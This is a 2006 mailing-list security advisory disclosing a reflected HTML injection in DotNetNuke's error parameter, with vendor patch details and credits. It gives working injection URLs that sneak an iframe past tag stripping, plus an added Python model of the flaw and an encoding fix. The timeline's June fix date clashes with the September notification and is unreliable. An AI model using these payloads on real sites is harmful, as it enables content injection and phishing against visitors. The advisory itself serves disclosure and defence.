Message-ID: <20060920070850.6732.qmail@mail.superb.net>
Date: Wed, 20 Sep 2006 03:08:49 -0400
From: contact@...ureshapes.com
To: full-disclosure@...ts.grok.org.uk
Subject: DotNetNuke HTML Code Injection
Security Advisory: VULN20-09-2006 -
http://www.secureshapes.com/advisories/vuln20-09-2006.htm
Vendor Security Bulletin:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletinno3/tabid/990/Default.aspx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DotNetNuke - HTML Code Injection Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
* Date: 20/09/2006
* Severity: Low
* Impact: Code Injection
* Solution Status: Vendor Patch
* Version: All versions of DotNetNuke
* Vendor Website: http://dotnetnuke.com/
:: ABOUT THE SOFTWARE
DotNetNuke® is an Open Source Framework ideal for creating Enterprise Web
Applications.
Unfortunately, DotNetNuke is vulnerable to HTML code injection.
:: TECHNICAL DESCRIPTION
The error parameter in the URL is reflected into the page and can be
manipulated to inject HTML code.
Example:
http://xxxxxx/Default.aspx?tabid=510&error=The+state+information+is+invalid+for+this+page+and+might+be+corrupted
HTML code can be injected through that error parameter.
In particular, it is also possible to reproduce the space character by
inserting complete HTML tags such as <script></script> and/or <form></form>
in the injected code. This allows the attacker to specify attributes in the
injected HTML tags.
Example:
http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<script></script>/><iframe<script></script>src=http://www.google.com>
or
http://xxxxxxxxxxxx/Default.aspx?tabid=510&error="<form></form>/><iframe<form></form>src=http://www.google.com>
In the HTML source code, the injection results in:
<form name="Form" method="post" action="/Default.aspx?tabid=510&error="
/><iframe src=http://www.google.com>" id="Form"
enctype="multipart/form-data" style="height: 100%;">
The space between iframe and src in the rendered HTML appears where the
complete tag was injected: that tag is removed from the output, and the
space it leaves behind separates the attribute from the tag name.
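The issue above comes down to an untrusted query parameter being written into a form attribute after tag stripping rather than attribute-context encoding. The following Python models that contrast; it is an added example, not DotNetNuke's code, and strip_complete_tags is a constructed assumption about the filter behaviour the advisory describes, not the vendor's actual implementation.

```python
import html
import re

# Constructed model of a tag-stripping filter: complete <tag></tag> pairs are
# removed and a space is left where they stood. ASSUMPTION about the behaviour
# described in the advisory, not DotNetNuke's real code.
def strip_complete_tags(value: str) -> str:
    return re.sub(r"<(\w+)></\1>", " ", value)


def render_form_stripped(path: str, error: str) -> str:
    """Weak pattern: the value goes into the action attribute after tag
    stripping only. Quotes and stray '<' survive, so the attribute can be
    closed and a new tag opened inside the form element."""
    action = f"{path}?error={strip_complete_tags(error)}"
    return f'<form name="Form" method="post" action="{action}" id="Form">'


def render_form_encoded(path: str, error: str) -> str:
    """Hardened pattern: encode for the HTML attribute context. '<', '>',
    '&' and both quote characters become entities, so the value can never
    terminate the attribute or start a tag. (URL-encoding the query value is
    a separate, additional layer not shown here.)"""
    action = f"{path}?error={html.escape(error, quote=True)}"
    return f'<form name="Form" method="post" action="{action}" id="Form">'


def attribute_breakout(rendered: str) -> bool:
    """Detection check for a rendered <form ...> tag: a correctly encoded
    attribute never contains a literal '<' after the tag name."""
    return "<" in rendered[len("<form"):]


if __name__ == "__main__":
    # The advisory's own payload, used here as constructed test input.
    payload = '"<script></script>/><iframe<script></script>src=http://www.google.com>'
    print(render_form_stripped("/Default.aspx", payload))
    print(render_form_encoded("/Default.aspx", payload))
```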
:: VENDOR RESPONSE
The vendor security bulletin link is:
http://dotnetnuke.com/About/WhatIsDotNetNuke/SecurityPolicy/SecurityBulletinno3/tabid/990/Default.aspx
The patches are available here (registration is needed in order to download
them):
http://www.dotnetnuke.com/tabid/125/default.aspx
:: DISCLOSURE TIMEFRAME
04/09/2006 - Preliminary Vendor notification.
06/09/2006 - Vulnerability confirmed in all versions
17/06/2006 - DotNetNuke releases version 3.3.5 and 4.3.5 with fix
20/09/2006 - Coordinated public release.
Total Time to Fix: 13 days
:: CREDIT
The vulnerability was discovered by Roberto Suggi Liverani and Antonio Spera
of Secure Shapes.
~~~~~~~~~~~~~~~~~~~
About Secure Shapes
~~~~~~~~~~~~~~~~~~~
Secure Shapes Ltd provides vulnerability assessments, website penetration
testing, network penetration testing and security consultancy.
E-mail: contact [at] secureshapes.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/